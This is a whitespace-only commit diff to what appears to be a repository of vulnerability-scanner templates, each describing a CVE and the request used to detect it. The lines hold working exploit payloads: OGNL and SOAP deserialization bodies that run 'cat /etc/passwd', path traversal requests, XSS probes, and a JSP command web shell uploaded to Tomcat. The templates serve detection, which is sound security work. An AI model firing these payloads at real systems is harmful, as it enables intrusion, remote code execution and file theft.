Satisfying the linter (all errors and warnings)

* whitespace modifications only
patch-1
forgedhallpass 2021-08-19 17:44:46 +03:00
parent 2a320412bf
commit 77103bc629
140 changed files with 543 additions and 543 deletions

View File

@ -5,8 +5,8 @@ info:
author: pikpikcu author: pikpikcu
severity: high severity: high
reference: reference:
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491 - https://www.cnvd.org.cn/webinfo/show/6491
tags: beanshell,rce,cnvd tags: beanshell,rce,cnvd
requests: requests:

View File

@ -15,7 +15,7 @@ requests:
headers: headers:
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
body: | body: |
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -12,10 +12,10 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -15,7 +15,7 @@ requests:
headers: headers:
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
body: | body: |
name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -7,8 +7,8 @@ info:
description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container. description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
tags: cve,cve2013,lfi,javafaces,oracle tags: cve,cve2013,lfi,javafaces,oracle
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827 - https://nvd.nist.gov/vuln/detail/CVE-2013-3827
- https://www.exploit-db.com/exploits/38802 - https://www.exploit-db.com/exploits/38802
requests: requests:
- method: GET - method: GET

View File

@ -6,8 +6,8 @@ info:
severity: high severity: high
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
reference: reference:
- https://www.exploit-db.com/exploits/38936 - https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240 - https://nvd.nist.gov/vuln/detail/CVE-2013-7240
tags: cve,cve2013,wordpress,wp-plugin,lfi tags: cve,cve2013,wordpress,wp-plugin,lfi
requests: requests:

View File

@ -6,8 +6,8 @@ info:
severity: medium severity: medium
tags: cve,cve2014,weblogic,oracle,ssrf tags: cve,cve2014,weblogic,oracle,ssrf
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://nvd.nist.gov/vuln/detail/CVE-2014-4210
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
requests: requests:
- method: GET - method: GET

View File

@ -9,7 +9,7 @@ info:
- https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
- http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
description: | description: |
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
tags: cve,cve2015,jetty tags: cve,cve2015,jetty
requests: requests:

View File

@ -1,25 +1,25 @@
id: CVE-2015-3337 id: CVE-2015-3337
info: info:
name: Elasticsearch Head plugin LFI name: Elasticsearch Head plugin LFI
author: pdteam author: pdteam
severity: high severity: high
description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors. description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
reference: https://www.exploit-db.com/exploits/37054/ reference: https://www.exploit-db.com/exploits/37054/
tags: cve,cve2015,elastic,lfi tags: cve,cve2015,elastic,lfi
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd" - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
part: body part: body
- type: status - type: status
status: status:
- 200 - 200

View File

@ -1,27 +1,27 @@
id: CVE-2015-5688 id: CVE-2015-5688
info: info:
name: Geddy before v13.0.8 LFI name: Geddy before v13.0.8 LFI
author: pikpikcu author: pikpikcu
severity: high severity: high
description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI. description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
reference: reference:
- https://nodesecurity.io/advisories/geddy-directory-traversal - https://nodesecurity.io/advisories/geddy-directory-traversal
- https://github.com/geddy/geddy/issues/697 - https://github.com/geddy/geddy/issues/697
tags: cve,cve2015,geddy,lfi tags: cve,cve2015,geddy,lfi
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
part: body part: body
- type: status - type: status
status: status:
- 200 - 200

View File

@ -5,8 +5,8 @@ info:
author: 0x_Akoko author: 0x_Akoko
description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability
reference: reference:
- https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-7823 - https://nvd.nist.gov/vuln/detail/CVE-2015-7823
severity: low severity: low
tags: cve,cve2015,kentico,redirect tags: cve,cve2015,kentico,redirect

View File

@ -7,8 +7,8 @@ info:
tags: cve,cve2016,network,iot,hp,rce tags: cve,cve2016,network,iot,hp,rce
description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623. description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
reference: reference:
- https://www.exploit-db.com/exploits/39858 - https://www.exploit-db.com/exploits/39858
- https://nvd.nist.gov/vuln/detail/CVE-2016-2004 - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
network: network:
- inputs: - inputs:

View File

@ -1,24 +1,24 @@
id: CVE-2017-1000028 id: CVE-2017-1000028
info: info:
name: GlassFish LFI name: GlassFish LFI
author: pikpikcu author: pikpikcu
severity: high severity: high
description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request. description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
reference: https://www.exploit-db.com/exploits/45196 reference: https://www.exploit-db.com/exploits/45196
tags: cve,cve2017,oracle,glassfish,lfi tags: cve,cve2017,oracle,glassfish,lfi
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "/sbin/nologin" - "/sbin/nologin"
part: body part: body
- type: status - type: status
status: status:
- 200 - 200

View File

@ -6,10 +6,10 @@ info:
severity: critical severity: critical
description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
reference: reference:
- https://github.com/mogwailabs/CVE-2017-1000486 - https://github.com/mogwailabs/CVE-2017-1000486
- https://github.com/pimps/CVE-2017-1000486 - https://github.com/pimps/CVE-2017-1000486
- https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000486 - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
tags: cve,cve2017,primetek,rce tags: cve,cve2017,primetek,rce
requests: requests:

View File

@ -13,52 +13,52 @@ info:
requests: requests:
- raw: - raw:
- | - |
POST /wls-wsat/CoordinatorPortType HTTP/1.1 POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept: */* Accept: */*
Accept-Language: en Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close Connection: close
Content-Type: text/xml Content-Type: text/xml
Content-Length: 5178 Content-Length: 5178
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java> <java>
<void class="weblogic.utils.Hex" method="fromHexString" id="cls"> <void class="weblogic.utils.Hex" method="fromHexString" id="cls">
<string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string> <string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string>
</void> </void>
<void class="org.mozilla.classfile.DefiningClassLoader"> <void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass"> <void method="defineClass">
<string>com.supeream.exploits.XmlExp</string> <string>com.supeream.exploits.XmlExp</string>
<object idref="cls"></object> <object idref="cls"></object>
<void method="newInstance"> <void method="newInstance">
<void method="say" id="proc"> <void method="say" id="proc">
<string>cat /etc/passwd</string> <string>cat /etc/passwd</string>
</void> </void>
</void> </void>
</void> </void>
</void> </void>
<void class="java.lang.Thread" method="currentThread"> <void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork"> <void method="getCurrentWork">
<void method="getResponse"> <void method="getResponse">
<void method="getServletOutputStream"> <void method="getServletOutputStream">
<void method="writeStream"> <void method="writeStream">
<object idref="proc"></object> <object idref="proc"></object>
</void> </void>
<void method="flush"/> <void method="flush"/>
</void> </void>
<void method="getWriter"><void method="write"><string></string></void></void> <void method="getWriter"><void method="write"><string></string></void></void>
</void> </void>
</void> </void>
</void> </void>
</java> </java>
</work:WorkContext> </work:WorkContext>
</soapenv:Header> </soapenv:Header>
<soapenv:Body/> <soapenv:Body/>
</soapenv:Envelope> </soapenv:Envelope>
matchers: matchers:
- type: regex - type: regex

View File

@ -6,9 +6,9 @@ info:
severity: critical severity: critical
description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data. description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-12149 - https://nvd.nist.gov/vuln/detail/CVE-2017-12149
- https://chowdera.com/2020/12/20201229190934023w.html - https://chowdera.com/2020/12/20201229190934023w.html
- https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
tags: cve,cve2017,java,rce,deserialization tags: cve,cve2017,java,rce,deserialization
requests: requests:

View File

@ -6,8 +6,8 @@ info:
severity: critical severity: critical
description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found. description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-12542 - https://nvd.nist.gov/vuln/detail/CVE-2017-12542
- https://www.exploit-db.com/exploits/44005 - https://www.exploit-db.com/exploits/44005
tags: cve,cve2017,ilo4,hpe tags: cve,cve2017,ilo4,hpe
requests: requests:

View File

@ -7,10 +7,10 @@ info:
tags: cve,cve2017,apache,rce tags: cve,cve2017,apache,rce
reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615 reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
description: | description: |
By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers. By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79} However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request. Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
requests: requests:
- method: PUT - method: PUT
@ -19,21 +19,21 @@ requests:
headers: headers:
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
body: | body: |
<%@ page import="java.util.*,java.io.*"%> <%@ page import="java.util.*,java.io.*"%>
<% <%
if (request.getParameter("cmd") != null) { if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>"); out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream(); OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream(); InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in); DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine(); String disr = dis.readLine();
while ( disr != null ) { while ( disr != null ) {
out.println(disr); out.println(disr);
disr = dis.readLine(); disr = dis.readLine();
} }
} }
%> %>
- method: GET - method: GET
path: path:

View File

@ -6,10 +6,10 @@ info:
severity: critical severity: critical
tags: cve,cve2017,solr,apache,oob,xxe tags: cve,cve2017,solr,apache,oob,xxe
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629 - https://nvd.nist.gov/vuln/detail/CVE-2017-12629
- https://twitter.com/honoki/status/1298636315613974532 - https://twitter.com/honoki/status/1298636315613974532
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
requests: requests:
- raw: - raw:

View File

@ -7,9 +7,9 @@ info:
description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
tags: cve,cve2017,sap,lfi tags: cve,cve2017,sap,lfi
reference: reference:
- https://www.cvedetails.com/cve/CVE-2017-12637/ - https://www.cvedetails.com/cve/CVE-2017-12637/
- https://nvd.nist.gov/vuln/detail/CVE-2017-12637 - https://nvd.nist.gov/vuln/detail/CVE-2017-12637
- https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
requests: requests:
- method: GET - method: GET

View File

@ -5,8 +5,8 @@ info:
author: pikpikcu author: pikpikcu
severity: high severity: high
reference: reference:
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
- https://www.exploit-db.com/exploits/49913 - https://www.exploit-db.com/exploits/49913
